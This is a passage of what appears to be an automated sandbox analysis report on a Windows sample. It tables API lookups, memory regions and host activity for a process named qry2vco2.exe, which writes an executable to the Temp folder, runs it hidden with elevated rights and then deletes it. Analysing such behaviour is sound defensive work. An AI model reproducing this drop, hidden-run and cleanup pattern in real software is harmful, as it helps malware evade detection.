| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Workflow.VisualBasic.Targets" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Workflow.VisualBasic.Targets" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #127: qry2vco2.exe
179
0
| Information | Value |
|---|---|
| ID | #127 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:36, Reason: Child Process |
| Unmonitor | End Time: 00:03:01, Reason: Self Terminated |
| Monitor Duration | 00:00:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x828 |
| Parent PID | 0x1b4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
8EC
0x
FCC
0x
FCC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00210000 | 0x00239fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x00947fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000950000 | 0x00950000 | 0x00ad0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x01edffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | os_pid = 0xf08, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:13 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
